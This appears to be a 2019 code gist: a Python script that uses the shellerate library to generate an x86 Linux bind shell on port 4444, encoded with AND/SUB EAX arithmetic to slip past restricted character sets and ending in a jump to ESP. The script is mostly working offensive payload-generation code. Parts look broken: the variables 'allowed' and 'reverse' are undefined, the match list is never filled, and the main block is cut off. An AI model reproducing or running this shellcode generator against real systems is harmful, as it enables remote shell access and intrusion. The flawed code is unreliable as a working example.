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Created April 19, 2019 12:33
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bind shell shellcode encoded with SUB EAX technique
#!/usr/bin/env python
# Please install shellerate>=0.4.2 before: pip install shellerate
import sys
import string
import logging
import secrets
from shellerate import strings;
from shellerate import asm_x86;
from shellerate.bind_shellcode import BindShellcode;
# The code for find_encoded_sequence and generate_add_eax_sum_shellcode was
# taken from vulnserver works with some slight
# change and integrating into shellerate
def find_encoded_sequence(dword, three=False):
a_int = [ord(n) for n in list(allowed)]
matches = []
zero = False
carry = 0
for x in range(0, 4):
byte = (dword - (carry | zero)) % 256
found = False
l = [(f1, f2) for f1 in a_int for f2 in a_int]
if three:
l = [(f1, f2, f3) for f1 in a_int for f2 in a_int for f3 in a_int]
for i in l:
if not found and (sum(i) % 256) == byte and len(set(i) - set(a_int)) == 0:
found = True
carry = (sum(i) >= 0x100)
zero = False #(byte == 0xFF)
dword >>= 8
return matches
def generate_add_eax_sum_shellcode(result):
compl_two = int("FFFFFFFF", 16) - int(result, 16) + 1
c = find_encoded_sequence(compl_two)
c2_h = "0x{:08x}".format(compl_two)
f = ["".join(["{:02x}".format(j) for j in list(i)]) for i in zip(*c[::-1])]
f_sum = "0x{:08x}".format(sum([int(i, 16) for i in f]) % (2**32))
if (c2_h != f_sum):
logging.warning("can't find a good encoded sequence using 2 operands... trying with 3")
c = find_encoded_sequence(compl_two, True)
f = ["".join(["{:02x}".format(j) for j in list(i)]) for i in zip(*c[::-1])]
f_sum = "0x{:08x}".format(sum([int(i, 16) for i in f]) % (2**32))
if(c2_h != f_sum):
logging.error("can't find a good encoded sequence. Please consider changing this shellcode sequence" + result)
return ""
logging.debug("obtaining 0x{0} with this ASM sequence".format(result))
for i in ("554e4d4a", "2a313235"):
logging.debug("AND EAX, 0x{0}".format(i))
for j in f:
logging.debug("SUB EAX, 0x{0}".format(j))
logging.debug("PUSH EAX")
shellcode = asm_x86.zero_with_and("eax")
for i in f:
shellcode += "\\x2d" + strings.from_string_to_payload(strings.swap(i))
return shellcode
def generate_exploit():
b=BindShellcode(4444, 'x86', 'linux')
original_shellcode = b.shellcode()
padded = strings.pad(original_shellcode)
o1 = strings.from_char_to_hexcode(padded)
words = strings.split(reverse, 8)
shellcode = ""
shellcode += asm_x86.zero_eax()
shellcode += asm_x86.get_esp_address_in_eax()
# shellcode += "\\x2d\\x66\\x4d\\x55\\x55\\x2d\\x66\\x4b\\x55\\x55\\x2d\\x6a\\x50\\x55\\x55" # get some free space into the stack
# shellcode += "\\x50\\x5c" #PUSH EAX + POP ESP
for w in words:
shellcode += generate_add_eax_sum_shellcode(w)
shellcode += "\\xff\\xe4";
return shellcode
if __name__ == "__main__":
logging.basicConfig(format='[%(levelname)s] %(asctime)s - %(message)s',
datefmt='%d/%b/%y %H:%M:%S')
logging.debug("GENERATING shellcode")
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